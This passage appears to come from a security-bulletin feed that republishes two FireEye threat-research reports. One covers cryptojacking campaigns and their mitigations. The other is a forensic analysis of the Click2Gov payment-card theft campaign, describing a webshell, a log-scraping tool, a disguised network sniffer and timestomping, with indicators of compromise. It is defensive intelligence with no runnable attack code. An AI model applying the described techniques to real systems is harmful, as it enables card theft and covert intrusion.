power. Some of the most commonly observed devices targeted by these cryptojacking schemes are:\n\n * User endpoint machines\n * Enterprise servers\n * Websites\n * Mobile devices\n * Industrial control systems\n\n##### Cryptojacking in the Cloud\n\nPrivate sector companies and governments alike are increasingly [moving their data and applications to the cloud](<https://www.fireeye.com/blog/executive-perspective/2018/04/anatomy-of-a-public-cloud-compromise.html>), and cyber threat groups have been moving with them. Recently, there have been various reports of actors conducting cryptocurrency mining operations specifically targeting cloud infrastructure. Cloud infrastructure is increasingly a target for cryptojacking operations because it offers actors an attack surface with large amounts of processing power in an environment where CPU usage and electricity costs are already expected to be high, thus allowing their operations to potentially go unnoticed. We assess with high confidence that threat actors will continue to target enterprise cloud networks in efforts to harness their collective computational resources for the foreseeable future.\n\nThe following are some real-world examples of cryptojacking in the cloud:\n\n * In February 2018, FireEye researchers published a blog detailing various techniques actors used in order to deliver malicious miner payloads (specifically to vulnerable Oracle servers) by abusing CVE-2017-10271. Refer to our blog post for more detailed information regarding the [post-exploitation and pre-mining dissemination techniques](<https://www.fireeye.com/blog/threat-research/2018/02/cve-2017-10271-used-to-deliver-cryptominers.html>) used in those campaigns.\n * In March 2018, [Bleeping Computer reported](<https://www.bleepingcomputer.com/news/security/coinminer-campaigns-move-to-the-cloud-via-docker-kubernetes/>) on the trend of cryptocurrency mining campaigns moving to the cloud via vulnerable Docker and Kubernetes applications, which are two software tools used by developers to help scale a company's cloud infrastructure. In most cases, successful attacks occur due to misconfigured applications and/or weak security controls and passwords.\n * In February 2018, [Bleeping Computer also reported](<https://www.bleepingcomputer.com/news/security/tesla-internal-servers-infected-with-cryptocurrency-miner/>) on hackers who breached Tesla's cloud servers to mine Monero. Attackers identified a Kubernetes console that was not password protected, allowing them to discover login credentials for the broader Tesla Amazon Web services (AWS) S3 cloud environment. Once the attackers gained access to the AWS environment via the harvested credentials, they effectively launched their cryptojacking operations.\n * Reports of cryptojacking activity due to misconfigured AWS S3 cloud storage buckets have also been observed, as was the case in the [LA Times online compromise](<https://www.theregister.co.uk/2018/02/22/la_times_amazon_aws_s3/>) in February 2018. The presence of vulnerable AWS S3 buckets allows anyone on the internet to access and change hosted content, including the ability to inject mining scripts or other malicious software.\n\n##### Incorporation of Cryptojacking into Existing Botnets\n\nFireEye iSIGHT Intelligence has observed multiple prominent botnets such as Dridex and Trickbot incorporate cryptocurrency mining into their existing operations. Many of these families are modular in nature and have the ability to download and execute remote files, thus allowing the operators to easily turn their infections into cryptojacking bots. While these operations have traditionally been aimed at credential theft (particularly of banking credentials), adding mining modules or downloading secondary mining payloads provides the operators another avenue to generate additional revenue with little effort. This is especially true in cases where the victims were deemed unprofitable or have already been exploited in the original scheme.\n\nThe following are some real-world examples of cryptojacking being incorporated into existing botnets:\n\n * In early February 2018, FireEye iSIGHT Intelligence observed Dridex botnet ID 2040 download a Monero cryptocurrency miner based on the open-source XMRig miner.\n * On Feb. 12, 2018, FireEye iSIGHT Intelligence observed the banking malware IcedID injecting Monero-mining JavaScript into webpages for specific, targeted URLs. The IcedID injects launched an anonymous miner using the mining code from Coinhive's [AuthedMine](<https://authedmine.com/lib/authedmine.min.js>).\n * In late 2017, [Bleeping Computer reported](<https://www.bleepingcomputer.com/news/security/codefork-group-uses-fileless-malware-to-deploy-monero-miners/>) that security researchers with Radware observed the hacking group CodeFork leveraging the popular downloader Andromeda (aka Gamarue) to distribute a miner module to their existing botnets.\n * In late 2017, FireEye researchers observed Trickbot operators deploy a new module named \"testWormDLL\" that is a statically compiled copy of the popular XMRig Monero miner.\n * On Aug. 29, 2017, [Security Week reported](<https://www.securityweek.com/jimmy-banking-trojan-reuses-nukebot-code>) on a variant of the popular Neutrino banking Trojan, including a Monero miner module. According to their reporting, the new variant no longer aims at stealing bank card data, but instead is limited to downloading and executing modules from a remote server.\n\n#### Drive-By Cryptojacking\n\n##### In-Browser\n\nFireEye iSIGHT Intelligence has examined various customer reports of browser-based cryptocurrency mining. Browser-based mining scripts have been observed on compromised websites, third-party advertising platforms, and have been legitimately placed on websites by publishers. While coin mining scripts can be embedded directly into a webpage's source code, they are frequently loaded from third-party websites. Identifying and detecting websites that have embedded coin mining code can be difficult since not all coin mining scripts are authorized by website publishers, such as in the case of a compromised website. Further, in cases where coin mining scripts were authorized by a website owner, they are not always clearly communicated to site visitors. At the time of reporting, the most popular script being deployed in the wild is Coinhive. Coinhive is an open-source JavaScript library that, when loaded on a vulnerable website, can mine Monero using the site visitor's CPU resources, unbeknownst to the user, as they browse the site.\n\nThe following are some real-world examples of Coinhive being deployed in the wild:\n\n * In September 2017, [Bleeping Computer reported](<https://www.bleepingcomputer.com/news/security/chrome-extension-embeds-in-browser-monero-miner-that-drains-your-cpu/>) that the authors of SafeBrowse, a Chrome extension with more than 140,000 users, had embedded the Coinhive script in the extension's code that allowed for the mining of Monero using users' computers and without getting their consent.\n * During mid-September 2017, [users on Reddit](<https://www.reddit.com/r/thepiratebay/comments/70aip7/100_cpu_on_all_8_threads_while_visiting_tpb/?sort=new>) began complaining about increased CPU usage when they navigated to a popular torrent site, The Pirate Bay (TPB). The spike in CPU usage was a result of Coinhive's script being embedded within the site's footer. According to TPB operators, it was implemented as a test to generate passive revenue for the site (Figure 8).\n * In December 2017, researchers with [Sucuri reported](<https://blog.sucuri.net/2017/12/malicious-cryptominers-from-github.html>) on the presence of the Coinhive script being hosted on GitHub.io, which allows users to publish web pages directly from GitHub repositories.\n * Other reporting disclosed the Coinhive script being embedded on the [Showtime domain](<https://www.bleepingcomputer.com/news/security/showtime-websites-used-to-mine-monero-unclear-if-hack-or-an-experiment/>) as well as on the [LA Times website](<https://www.itwire.com/security/81860-la-times-serving-cryptocurrency-mining-script.html>), both surreptitiously mining Monero.\n * A majority of in-browser cryptojacking activity is transitory in nature and will last only as long as the user\u2019s web browser is open. However, [researchers with Malwarebytes Labs](<https://blog.malwarebytes.com/cybercrime/2017/11/persistent-drive-by-cryptomining-coming-to-a-browser-near-you/>) uncovered a technique that allows for continued mining activity even after the browser window is closed. The technique leverages a pop-under window surreptitiously hidden under the taskbar. As researchers pointed out, closing the browser window may not be enough to interrupt the activity, and that more advanced actions like running the Task Manager may be required.\n\n \nFigure 8: Statement from TPB operators on Coinhive script\n\n##### Malvertising and Exploit Kits\n\nMalvertisements \u2013 malicious ads on legitimate websites \u2013 commonly redirect visitors of a site to an exploit kit landing page. These landing pages are designed to scan a system for vulnerabilities, exploit those vulnerabilities, and download and execute malicious code onto the system. Notably, the malicious advertisements can be placed on legitimate sites and visitors can become infected with little to no user interaction. This distribution tactic is commonly used by threat actors to widely distribute malware and has been employed in various cryptocurrency mining operations.\n\nThe following are some real-world examples of this activity:\n\n * In early 2018, [researchers with Trend Micro reported](<https://www.bleepingcomputer.com/news/security/coinhive-cryptojacker-deployed-on-youtube-via-google-ads/>) that a modified miner script was being disseminated across YouTube via Google's DoubleClick ad delivery platform. The script was configured to generate a random number variable between 1 and 100, and when the variable was above 10 it would launch the Coinhive script _coinhive.min.js_, which harnessed 80 percent of the CPU power to mine Monero. When the variable was below 10 it launched a modified Coinhive script that was also configured to harness 80 percent CPU power to mine Monero. This custom miner connected to the mining pool wss[:]//ws[.]l33tsite[.]info:8443, which was likely done to avoid Coinhive's fees.\n * In April 2018, researchers with [Trend Micro](<https://blog.trendmicro.com/trendlabs-security-intelligence/cryptocurrency-web-miner-script-injected-into-aol-advertising-platform/>) also discovered a JavaScript code based on Coinhive injected into an AOL ad platform. The miner used the following private mining pools: wss[:]//wsX[.]www.datasecu[.]download/proxy and wss[:]//www[.]jqcdn[.]download:8893/proxy. Examination of other sites compromised by this campaign showed that in at least some cases the operators were hosting malicious content on unsecured AWS S3 buckets.\n * Since July 16, 2017, [FireEye has observed](<https://www.fireeye.com/blog/threat-research/2017/08/neptune-exploit-kit-malvertising.html>) the Neptune Exploit Kit redirect to ads for hiking clubs and MP3 converter domains. Payloads associated with the latter include Monero CPU miners that are surreptitiously installed on victims' computers.\n * In January 2018, [Check Point researchers](<https://research.checkpoint.com/new-rig-exploit-kit-campaign-dropping-xmrig-miner/>) discovered a malvertising campaign leading to the Rig Exploit Kit, which served the XMRig Monero miner utility to unsuspecting victims.\n\n#### Mobile Cryptojacking\n\nIn addition to targeting enterprise servers and user machines, threat actors have also targeted mobile devices for cryptojacking operations. While this technique is less common, likely due to the limited processing power afforded by mobile devices, cryptojacking on mobile devices remains a threat as sustained power consumption can damage the device and dramatically shorten the battery life. Threat actors have been observed targeting mobile devices by hosting malicious cryptojacking apps on popular app stores and through drive-by malvertising campaigns that identify users of mobile browsers.\n\nThe following are some real-world examples of mobile devices being used for cryptojacking:\n\n * During 2014, FireEye iSIGHT Intelligence reported on multiple Android malware apps capable of mining cryptocurrency:\n * In March 2014, Android malware named \"CoinKrypt\" was discovered, which mined Litecoin, Dogecoin, and CasinoCoin currencies.\n * In March 2014, another form of Android malware \u2013 \"Android.Trojan.MuchSad.A\" or \"ANDROIDOS_KAGECOIN.HBT\" \u2013 was observed mining Bitcoin, Litecoin, and Dogecoin currencies. The malware was disguised as copies of popular applications, including \"Football Manager Handheld\" and \"TuneIn Radio.\" Variants of this malware have reportedly been downloaded by millions of Google Play users.\n * In April 2014, Android malware named \"BadLepricon,\" which mined Bitcoin, was identified. The malware was reportedly being bundled into wallpaper applications hosted on the Google Play store, at least several of which received 100 to 500 installations before being removed.\n * In October 2014, a type of mobile malware called \"Android Slave\" was observed in China; the malware was reportedly capable of mining multiple virtual currencies.\n * In December 2017, [researchers with Kaspersky Labs reported](<https://securelist.com/jack-of-all-trades/83470/>) on a new multi-faceted Android malware capable of a variety of actions including mining cryptocurrencies and launching DDoS attacks. The resource load created by the malware has reportedly been high enough that it can cause the battery to bulge and physically destroy the device. The malware, dubbed Loapi, is unique in the breadth of its potential actions. It has a modular framework that includes modules for malicious advertising, texting, web crawling, Monero mining, and other activities. Loapi is thought to be the work of the same developers behind the 2015 Android malware Podec, and is usually disguised as an anti-virus app.\n * In January 2018, [SophosLabs released a report](<https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophos-coinminer-and-other-malicious-cryptominers-tpna.pdf?la=en>) detailing their discovery of 19 mobile apps hosted on Google Play that contained embedded Coinhive-based cryptojacking code, some of which were downloaded anywhere from 100,000 to 500,000 times.\n * Between November 2017 and January 2018, [researchers with Malwarebytes Labs reported](<https://blog.malwarebytes.com/threat-analysis/2018/02/drive-by-cryptomining-campaign-attracts-millions-of-android-users/>) on a drive-by cryptojacking campaign that affected millions of Android mobile browsers to mine Monero.\n\n#### Cryptojacking Spam Campaigns\n\nFireEye iSIGHT Intelligence has observed several cryptocurrency miners distributed via spam campaigns, which is a commonly used tactic to indiscriminately distribute malware. We expect malicious actors will continue to use this method to disseminate cryptojacking code as for long as cryptocurrency mining remains profitable.\n\nIn late November 2017, FireEye researchers identified a spam campaign delivering a malicious PDF attachment designed to appear as a legitimate invoice from the largest port and container service in New Zealand: Lyttelton Port of Chistchurch (Figure 9). Once opened, the PDF would launch a PowerShell script that downloaded a Monero miner from a remote host. The malicious miner connected to the pools supportxmr.com and nanopool.org.\n\n \nFigure 9: Sample lure attachment (PDF) that downloads malicious cryptocurrency miner\n\nAdditionally, a massive cryptojacking spam campaign was discovered by FireEye researchers during January 2018 that was designed to look like legitimate financial services-related emails. The spam email directed victims to an infection link that ultimately dropped a malicious ZIP file onto the victim's machine. Contained within the ZIP file was a cryptocurrency miner utility (MD5: 80b8a2d705d5b21718a6e6efe531d493) configured to mine Monero and connect to the minergate.com pool. While each of the spam email lures and associated ZIP filenames were different, the same cryptocurrency miner sample was dropped across all observed instances (Table 2).\n\n**ZIP Filenames** \n \n--- \n \ncalifornia_540_tax_form_2013_instructions.exe\n\nstate_bank_of_india_money_transfer_agency.exe\n\nformat_transfer_sms_banking_bni_ke_bca.exe\n\nconfirmation_receipt_letter_sample.exe\n\nsbi_online_apply_2015_po.exe\n\nestimated_tax_payment_coupon_irs.exe\n\nhow_to_add_a_non_us_bank_account_to_paypal.exe\n\nwestern_union_money_transfer_from_uk_to_bangladesh.exe\n\ncan_i_transfer_money_from_bank_of_ireland_to_aib_online.exe\n\nhow_to_open_a_business_bank_account_with_bad_credit_history.exe\n\napply_for_sbi_credit_card_online.exe\n\nlist_of_lucky_winners_in_dda_housing_scheme_2014.exe \n \nTable 2: Sampling of observed ZIP filenames delivering cryptocurrency miner\n\n#### Cryptojacking Worms\n\nFollowing the WannaCry attacks, actors began to increasingly incorporate self-propagating functionality within their malware. Some of the observed self-spreading techniques have included copying to removable drives, brute forcing SSH logins, and leveraging the leaked NSA exploit [EternalBlue](<https://www.fireeye.com/blog/threat-research/2017/05/smb-exploited-wannacry-use-of-eternalblue.html>). Cryptocurrency mining operations significantly benefit from this functionality since wider distribution of the malware multiplies the amount of CPU resources available to them for mining. Consequently, we expect that additional actors will continue to develop this capability.\n\nThe following are some real-world examples of cryptojacking worms:\n\n * In May 2017, [Proofpoint reported](<https://www.proofpoint.com/us/threat-insight/post/adylkuzz-cryptocurrency-mining-malware-spreading-for-weeks-via-eternalblue-doublepulsar>) a large campaign distributing mining malware \"Adylkuzz.\" This cryptocurrency miner was observed leveraging the EternalBlue exploit to rapidly spread itself over corporate LANs and wireless networks. This activity included the use of the DoublePulsar backdoor to download Adylkuzz. Adylkuzz infections create botnets of Windows computers that focus on mining Monero.\n * Security researchers with [Sensors identified](<https://sensorstechforum.com/w32-rarogminer-monero-miner-worm-lsass-exe-remove/>) a Monero miner worm, dubbed \"Rarogminer,\" in April 2018 that would copy itself to removable drives each time a user inserted a flash drive or external HDD.\n * In January 2018, [researchers at F5](<https://f5.com/labs/articles/threat-intelligence/malware/new-python-based-crypto-miner-botnet-flying-under-the-radar>) discovered a new Monero cryptomining botnet that targets Linux machines. PyCryptoMiner is based on Python script and spreads via the SSH protocol. The bot can also use Pastebin for its command and control (C2) infrastructure. The malware spreads by trying to guess the SSH login credentials of target Linux systems. Once that is achieved, the bot deploys a simple base64-encoded Python script that connects to the C2 server to download and execute more malicious Python code.\n\n#### Detection Avoidance Methods\n\nAnother trend worth noting is the use of proxies to avoid detection. The implementation of mining proxies presents an attractive option for cyber criminals because it allows them to avoid developer and commission fees of 30 percent or more. Avoiding the use of common cryptojacking services such as Coinhive, Cryptloot, and Deepminer, and instead hosting cryptojacking scripts on actor-controlled infrastructure, can circumvent many of the common strategies taken to block this activity via domain or file name blacklisting.\n\nIn March 2018, [Bleeping Computer reported](<https://www.bleepingcomputer.com/news/security/in-browser-cryptojacking-is-getting-harder-to-detect/>) on the use of cryptojacking proxy servers and determined that as the use of cryptojacking proxy services increases, the effectiveness of ad blockers and browser extensions that rely on blacklists decreases significantly.\n\nSeveral mining proxy tools can be found on GitHub, such as the [XMRig Proxy](<https://github.com/xmrig/xmrig-proxy>) tool, which greatly reduces the number of active pool connections, and the [CoinHive Stratum Mining Proxy](<https://github.com/x25/coinhive-stratum-mining-proxy>), which uses Coinhive\u2019s JavaScript mining library to provide an alternative to using official Coinhive scripts and infrastructure.\n\nIn addition to using proxies, actors may also establish their own self-hosted miner apps, either on private servers or cloud-based servers that supports Node.js. Although private servers may provide some benefit over using a commercial mining service, they are still subject to easy blacklisting and require more operational effort to maintain. According to [Sucuri researchers](<https://blog.sucuri.net/2018/01/malicious-cryptominers-from-github-part-2.html>), cloud-based servers provide many benefits to actors looking to host their own mining applications, including:\n\n * Available free or at low-cost\n * No maintenance, just upload the crypto-miner app\n * Harder to block as blacklisting the host address could potentially impact access to legitimate services\n * Resilient to permanent takedown as new hosting accounts can more easily be created using disposable accounts\n\nThe combination of proxies and crypto-miners hosted on actor-controlled cloud infrastructure presents a significant hurdle to security professionals, as both make cryptojacking operations more difficult to detect and take down.\n\n#### Mining Victim Demographics\n\nBased on data from FireEye detection technologies, the detection of cryptocurrency miner malware has increased significantly since the beginning of 2018 (Figure 10), with the most popular mining pools being minergate and nanopool (Figure 11), and the most heavily affected country being the U.S. (Figure 12). Consistent with [other reporting](<https://www.bleepingcomputer.com/news/cryptocurrency/students-mining-cryptocurrencies-are-clogging-up-university-networks/>), the education sector remains most affected, likely due to more relaxed security controls across university networks and students taking advantage of free electricity to mine cryptocurrencies (Figure 13).\n\n \nFigure 10: Cryptocurrency miner detection activity per month\n\n \nFigure 11: Commonly observed pools and associated ports\n\n \nFigure 12: Top 10 affected countries\n\n \nFigure 13: Top five affected industries\n\n \nFigure 14: Top affected industries by country\n\n#### Mitigation Techniques\n\n##### Unencrypted Stratum Sessions\n\nAccording to security researchers at Cato Networks, in order for a miner to participate in pool mining, the infected machine will have to run native or JavaScript-based code that uses the Stratum protocol over TCP or HTTP/S. The Stratum protocol uses a publish/subscribe architecture where clients will send subscription requests to join a pool and servers will send messages (publish) to its subscribed clients. These messages are simple, readable, JSON-RPC messages. Subscription requests will include the following entities: id, method, and params (Figure 15). A deep packet inspection (DPI) engine can be configured to look for these parameters in order to block Stratum over unencrypted TCP.\n\n \nFigure 15: Stratum subscription request parameters\n\n##### Encrypted Stratum Sessions\n\nIn the case of JavaScript-based miners running Stratum over HTTPS, detection is more difficult for DPI engines that do not decrypt TLS traffic. To mitigate encrypted mining traffic on a network, organizations may blacklist the IP addresses and domains of popular mining pools. However, the downside to this is identifying and updating the blacklist, as locating a reliable and continually updated list of popular mining pools can prove difficult and time consuming.\n\n##### Browser-Based Sessions\n\nIdentifying and detecting websites that have embedded coin mining code can be difficult since not all coin mining scripts are authorized by website publishers (as in the case of a compromised website). Further, in cases where coin mining scripts were authorized by a website owner, they are not always clearly communicated to site visitors.\n\nAs defenses evolve to prevent unauthorized coin mining activities, so will the techniques used by actors; however, blocking some of the most common indicators that we have observed to date may be effective in combatting a significant amount of the CPU-draining mining activities that customers have reported. Generic detection strategies for browser-based cryptocurrency mining include:\n\n * Blocking domains known to have hosted coin mining scripts\n * Blocking websites of known mining project websites, such as Coinhive\n * Blocking scripts altogether\n * Using an ad-blocker or coin mining-specific browser add-ons\n * Detecting commonly used naming conventions\n * Alerting and blocking traffic destined for known popular mining pools\n\nSome of these detection strategies may also be of use in blocking some mining functionality included in existing financial malware as well as mining-specific malware families.\n\nIt is important to note that JavaScript used in browser-based cryptojacking activity cannot access files on disk. However, if a host has inadvertently navigated to a website hosting mining scripts, we recommend purging cache and other browser data.\n\n#### Outlook\n\nIn underground communities and marketplaces there has been significant interest in cryptojacking operations, and numerous campaigns have been observed and reported by security researchers. These developments demonstrate the continued upward trend of threat actors conducting cryptocurrency mining operations, which we expect to see a continued focus on throughout 2018. Notably, malicious cryptocurrency mining may be seen as preferable due to the perception that it does not attract as much attention from law enforcement as compared to other forms of fraud or theft. Further, victims may not realize their computer is infected beyond a slowdown in system performance.\n\nDue to its inherent privacy-focused features and CPU-mining profitability, Monero has become one of the most attractive cryptocurrency options for cyber criminals. We believe that it will continue to be threat actors' primary cryptocurrency of choice, so long as the Monero blockchain maintains privacy-focused standards and is ASIC-resistant. If in the future the Monero protocol ever downgrades its security and privacy-focused features, then we assess with high confidence that threat actors will move to use another privacy-focused coin as an alternative.\n\nBecause of the anonymity associated with the Monero cryptocurrency and electronic wallets, as well as the availability of numerous cryptocurrency exchanges and tumblers, attribution of malicious cryptocurrency mining is very challenging for authorities, and malicious actors behind such operations typically remain unidentified. Threat actors will undoubtedly continue to demonstrate high interest in malicious cryptomining so long as it remains profitable and relatively low risk.\n", "modified": "2018-07-18T10:00:00", "published": "2018-07-18T10:00:00", "id": "FIREEYE:2473273CA0F291BCEBB5F99AA3E4F256", "href": "https://www.fireeye.com/blog/threat-research/2018/07/cryptocurrencies-cyber-crime-growth-of-miners.html", "type": "fireeye", "title": "How the Rise of Cryptocurrencies Is Shaping the Cyber Crime Landscape: The Growth of Miners", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-11T20:17:40", "bulletinFamily": "info", "cvelist": ["CVE-2017-3506", "CVE-2017-3248", "CVE-2017-10271"], "description": "FireEye has been tracking a campaign this year targeting web payment portals that involves on-premise installations of Click2Gov. [Click2Gov](<https://www.superion.com/public-administration/click2gov/>) is a web-based, interactive self-service bill-pay software solution developed by Superion. It includes various modules that allow users to pay bills associated with various local government services such as utilities, building permits, and business licenses. In October 2017, Superion released a statement [confirming suspicious activity](<https://www.superion.com/ceo-response-to-reported-breach/>) had affected a small number of customers. In mid-June 2018, numerous media reports referenced at least seven Click2Gov customers that were possibly affected by this campaign. Since June 2018, additional victims have been identified in public reporting. A review of public statements by these organizations appear to confirm compromises associated with Click2Gov.\n\nOn June 15, 2018, Superion released a statement describing their [proactive notification to affected customers](<https://www.superion.com/click2gov-update/>), work with a third-party forensic firm (not Mandiant), and deployment of patches to Click2Gov software and a related third-party component. Superion then concluded that there was no evidence that it is unsafe to make payments utilizing Click2Gov on hosted or secure on-premise networks with recommended patches and configurations.\n\nMandiant forensically analyzed compromised systems and recovered malware associated with this campaign, which provided insight into the capabilities of this new attacker. As of this publication, the discussed malware families have very low detection rates by antivirus solutions, as reported by VirusTotal.\n\n#### Attack Overview\n\nThe first stage of the campaign typically started with the attacker uploading a SJavaWebManage webshell to facilitate interaction with the compromised Click2Gov webserver. Through interaction with the webshell, the attacker enabled debug mode in a Click2Gov configuration file causing the application to write payment card information to plaintext log files. The attacker then uploaded a tool, which FireEye refers to as FIREALARM, to the webserver to parse these log files, retrieve the payment card information, and remove all log entries not containing error messages. Additionally, the attacker used another tool, SPOTLIGHT, to intercept payment card information from HTTP network traffic. The remainder of this blog post dives into the details of the attacker's tactics, techniques, and procedures (TTPs).\n\n#### SJavaWebManage Webshell\n\nIt is not known how the attacker compromised the Click2Gov webservers, but they likely employed an exploit targeting Oracle Web Logic such as CVE-2017-3248, CVE-2017-3506, or CVE-2017-10271, which would provide the capability to upload arbitrary files or achieve remote access. After exploiting the vulnerability, the attacker uploaded a variant of the [publicly available JavaServer Pages (JSP) webshell SJavaWebManage](<https://github.com/tennc/webshell/blob/master/jsp/SJavaWebManageV1.4.jsp>) to maintain persistence on the webserver. SJavaWebManage requires authentication to access four specific pages, as depicted in Figure 1, and will execute commands in the context of the Tomcat service, by default the Local System account.\n\n \nFigure 1: Sample SJavaWebManage interface\n\n * **EnvsInfo**: Displays information about the Java runtime, Tomcat version, and other information about the environment.\n * **FileManager**: Provides the ability to browse, upload, download (original or compressed), edit, delete, and timestomp files.\n * **CMDS**: Executes a command using cmd.exe (or /bin/sh if on a non-Windows system) and returns the response.\n * **DBManage**: Interacts with a database by connecting, displaying database metadata, and executing SQL commands.\n\nThe differences between the publicly available webshell and this variant include variable names that were changed to possibly inhibit detection, Chinese characters that were changed to English, references to SjavaWebManage that were deleted, and code to handle updates to the webshell being removed. Additionally, the variant identified during the campaign investigation included the ability to manipulate file timestamps on the server. This functionality is not present in the public version. The SJavaWebManage webshell provided the attacker a sufficient interface to easily interact with and manipulate the compromised hosts.\n\nThe attacker would then restart a module in DEBUG mode using the SJavaWebManage CMDS page after editing a Click2Gov XML configuration file. With the DEBUG logging option enabled, the Click2Gov module would log plaintext payment card data to the Click2Gov log files with naming convention Click2GovCX.logYYYY-MM-DD.\n\n#### FIREALARM\n\nUsing interactive commands within the webshell, the attacker uploaded and executed a datamining utility FireEye tracks as FIREALARM, which parses through Click2Gov log files to retrieve payment card data, format the data, and print it to the console.\n\nFIREALARM is a command line tool written in C/C++ that accepts three numbers as arguments; Year, Month, and Day, represented in a sample command line as: evil.exe 2018 09 01. From this example, FIREALARM would attempt to open and parse logs starting on 2018-09-01 until the present day. If the log files exists, FIREALARM copies the MAC (Modified, Accessed, Created) times to later timestomp the corresponding file back to original times. Each log file is then read line by line and parsed. FIREALARM searches each line for the following contents and parses the data:\n\n * medium.accountNumber\n * medium.cvv2\n * medium.expirationDate.year\n * medium.expirationDate.month\n * medium.firstName\n * medium.lastName\n * medium.middleInitial\n * medium.contact.address1\n * medium.contact.address2\n * medium.contact.city\n * medium.contact.state\n * medium.contact.zip.code\n\nThis data is formatted and printed to the console. The malware also searches for lines that contain the text ERROR -. If this string is found, the utility stores the contents in a temporary file named %WINDIR%\\temp\\THN1080.tmp. After searching every line in the Click2GovCX log file, the temporary file THN1080.tmp is copied to replace the respective Click2GovCX log file and the timestamps are replaced to the original, copied timestamps. The result is that FIREALARM prints payment card information to the console and removes the payment card data from each Click2GovCX log file, leaving only the error messages. Finally, the THN1080.tmp temporary file is deleted. This process is depicted in Figure 2.\n\n \nFigure 2: FIREALARM workflow\n\n 1. Attacker traverses Tor or other proxy and authenticates to SjavaWebManage.\n 2. Attacker launches cmd prompt via webshell.\n 3. Attacker runs FIREALARM with parameters.\n 4. FIREALARM verifies and iterates through log files, copies MAC times, parses and prints payment card data to the console, copies error messages to THN1080.tmp, overwrites the original log file and timestomps with orginal times.\n 5. THN1080.tmp is deleted.\n\n#### SPOTLIGHT\n\nLater, during attacker access to the compromised system, the attacker used the webshell to upload a network sniffer FireEye tracks as SPOTLIGHT. This tool offered the attacker better persistence to the host and continuous collection of payment card data, ensuring the mined data would not be lost if Click2GovCX log files were deleted by an administrator. SPOTLIGHT is also written in C/C++ and may be installed by command line arguments or run as a service. When run as a service, its tasks include ensuring that two JSP files exist, and monitoring and logging network traffic for specific HTTP POST request contents.\n\nSPOTLIGHT accepts two command line arguments:\n\n * gplcsvc.exe -i Creates a new service named gplcsvc with the display name Group Policy Service\n * gplcsvc.exe -u Stops and deletes the service named gplcsvc\n\nUpon installation, SPOTLIGHT will monitor two paths on the infected host every hour:\n\n 1. C:\\bea\\c2gdomain\\applications\\Click2GovCX\\scripts\\validator.jsp\n 2. C:\\bea\\c2gdomain\\applications\\ePortalLocalService\\axis2-web\\RightFrame.jsp\n\nIf either file does not exist, the malware Base64 decodes an embedded SJavaWebManage webshell and writes the same file to either path. This is the same webshell installed by the attacker during the initial compromise.\n\nAdditionally, SPOTLIGHT starts a socket listener to inspect IPv4 TCP traffic on port 80 and 7101. According to a Superion installation checklist, TCP port 7101 is used for application resolution from the internal network to the Click2Gov webserver. As long as the connection contents do not begin with GET /, the malware begins saving a buffer of received packets. The malware continues saving packet contents to an internal buffer until one of two conditions occurs \u2013 the buffer exceeds the size 102399 or the packet contents begin with the string POST /OnePoint/services/OnePointService. If either of these two conditions occur, the internal buffer data is searched for the following tags:\n\n * <op:AccountNum>\n * <op:CSC>\n * <op:ExpDate>\n * <op:FirstName>\n * <op:LastName>\n * <op:MInitial>\n * <op:Street1>\n * <op:Street2>\n * <op:City>\n * <op:State>\n * <op:PostalCode>\n\nThe contents between the tags are extracted and formatted with a `|`, which is used as a separator character. The formatted data is then Base64 encoded and appended to a log file at the hard-coded file path: c:\\windows\\temp\\opt.log. The attacker then used SJavaWebManage to exfiltrate the Base64 encoded log file containing payment card data. FireEye has not identified any manipulation of a compromised host\u2019s SSL configuration settings or redirection of SSL traffic to an unencrypted port. This process is depicted in Figure 3.\n\n \nFigure 3: SPOTLIGHT workflow\n\n 1. SPOTLIGHT verifies webshell file on an hourly basis, writing SJavaWebManage if missing.\n 2. SPOTLIGHT inspects IPv4 TCP traffic on port 80 or 7101, saving a buffer of received packets.\n 3. A user accesses Click2Gov module to make a payment.\n 4. SPOTLIGHT parses packets for payment card data, Base64 encodes and writes to opt.log.\n 5. Attacker traverses Tor or other proxy and authenticates to SJavaWebManage and launches File Manager.\n 6. Attacker exfiltrates opt.log file.\n\n#### Attribution\n\nBased on the available campaign information, the attacker doesn\u2019t align with any financially motivated threat groups currently tracked by FireEye. The attacker\u2019s understanding of the Click2Gov host requirements, process logging details, payment card fields, and internal communications protocols demonstrates an advanced knowledge of the Click2Gov application. Given the manner in which underground forums and marketplaces function, it is possible that tool development could have been contracted to third parties and remote access to compromised systems could have been achieved by one entity and sold to another. There is much left to be uncovered about this attacker. \n\nWhile it is also possible the attack was conducted by a single individual, FireEye assesses, with moderate confidence, that a team was likely involved in this campaign based on the following requisite skillsets:\n\n * Ability to locate Click2Gov installations and identify exploitable vulnerabilities.\n * Ability to craft or reuse an exploit to penetrate the target organization\u2019s network environment.\n * Basic JSP programming skills.\n * Advanced knowledge of Click2Gov payment processes and software sufficient to develop moderately sophisticated malware.\n * Proficient C/C++ programming skills.\n * General awareness of operational security.\n * Ability to monetize stolen payment card information.\n\n#### Conclusion\n\nIn addition to a regimented patch management program, FireEye recommends that organizations consider implementing a file integrity monitoring solution to monitor the static content and code that generates dynamic content on e-commerce webservers for unexpected modifications. Another best practice is to ensure any web service accounts run at least privilege.\n\nAlthough the TTPs observed in the attack lifecycle are generally consistent with other financially motivated attack groups tracked by FireEye, this attacker demonstrated ingenuity in crafting malware exploiting Click2Gov installations, achieving moderate success. Although it may transpire in a new form, FireEye anticipates this threat actor will continue to conduct interactive and financially motivated attacks.\n\n#### Detection\n\nFireEye\u2019s Adversary Pursuit Team from Technical Operations & Reverse Engineering \u2013 Advanced Practices works jointly with Mandiant Consulting and FireEye Labs Advanced Reverse Engineering (FLARE) during investigations assessed as directly supporting a nation-state or financial gains intrusions targeting organizations and involving interactive and focused efforts. The synergy of this relationship allows FireEye to rapidly identify new activity associated with currently tracked threat groups, as well as new threat actors, advanced malware, or TTPs leveraged by threat groups, and quickly mitigate them across the FireEye enterprise.\n\nFireEye detects the malware documented in this blog post as the following:\n\n * FE_Tool_Win32_FIREALARM_1\n * FE_Trojan_Win64_SPOTLIGHT_1\n * FE_Webshell_JSP_SJavaWebManage_1\n * Webshell.JSP.SJavaWebManage\n\n#### Indicators of Compromise (MD5)\n\n_SJavaWebManage_\n\n * 91eaca79943c972cb2ca7ee0e462922c \n * 80f8a487314a9573ab7f9cb232ab1642 \n * cc155b8cd261a6ed33f264e710ce300e (Publicly available 